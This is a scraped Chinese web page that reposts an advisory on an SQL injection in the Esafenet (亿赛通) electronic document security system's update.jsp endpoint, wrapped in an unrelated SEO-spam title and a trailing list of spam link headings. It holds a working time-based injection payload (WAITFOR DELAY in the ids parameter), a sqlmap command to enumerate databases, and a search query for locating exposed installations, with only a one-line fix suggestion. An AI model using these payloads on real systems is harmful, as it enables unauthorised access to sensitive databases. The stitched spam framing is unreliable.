当前位置: 首页 > news >正文

微信wxid二维码生成器重庆百度seo排名

微信wxid二维码生成器,重庆百度seo排名,中企动力做的网站后台怎么登录,把自己的电脑做网站服务器目录 0x01 漏洞介绍 0x02 影响产品 0x03 语法特征 0x04 漏洞复现页面 0x05 漏洞修复建议 0x01 漏洞介绍 亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台&#…

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现页面

0x05 漏洞修复建议


0x01 漏洞介绍

亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。
 

0x02 影响产品

  1. 亿赛通电子文档安全管理系统

0x03 语法特征

  1. app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现
页面
 

图片


POC

 
  1. CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

图片

图片

 
  1. python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

  2. ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

图片

                                                   没看够~?欢迎关注扫一扫~

http://www.ds6.com.cn/news/53461.html

相关文章:

  • 一个网站的建设方案b2b国际贸易平台
  • 入侵织梦网站开发一个平台需要多少钱
  • 看想看的做想做的电影网站好管理微信软件
  • 宽带业务办理一年多少钱关键词优化工具互点
  • 网站空间的存放种类长沙网站优化体验
  • 无锡网站制作哪家实惠百度seo是啥
  • 网站优化公司电话有哪些网站可以免费推广
  • 怎么给网站做 360快照seo网站建站
  • 网站空间续费多钱一年代写软文
  • 个人网站模板flash深圳正规seo
  • 北京好的设计公司有哪些大型seo公司
  • 做网站卖印度药美国seo薪酬
  • 济南代做标书网站标志公司网站建设价格
  • 多域名一个网站备案网址如何下载视频
  • 怎么做网站内容添加人工智能的关键词
  • 太月星网站建设程序开发seo外链建设的方法
  • 北京哪家做网站优化114外链
  • 如何建垃圾网站seo关键词排名优化方法
  • 南昌网站公司今日头条新闻10条简短
  • 怎么修改公司网站图片百度网络营销
  • 东莞创意网站设计效果图企业营销策划公司
  • 贵州软件开发 网站开发最新网站查询
  • 小程序低代码开发平台智能优化网站
  • 网站在什么地方设关键词数据分析工具
  • 手机上可建网站做淘宝客吗深圳龙华区大浪社区
  • 给你一个网站怎么做性能测试网络广告策划方案
  • 网站建设公司运营计划网络营销的现状和发展趋势
  • 网站开发有哪些风险西安seo计费管理
  • 做软件开发的网站有哪些北京seo费用是多少
  • 有网站如何做淘宝客cilimao磁力猫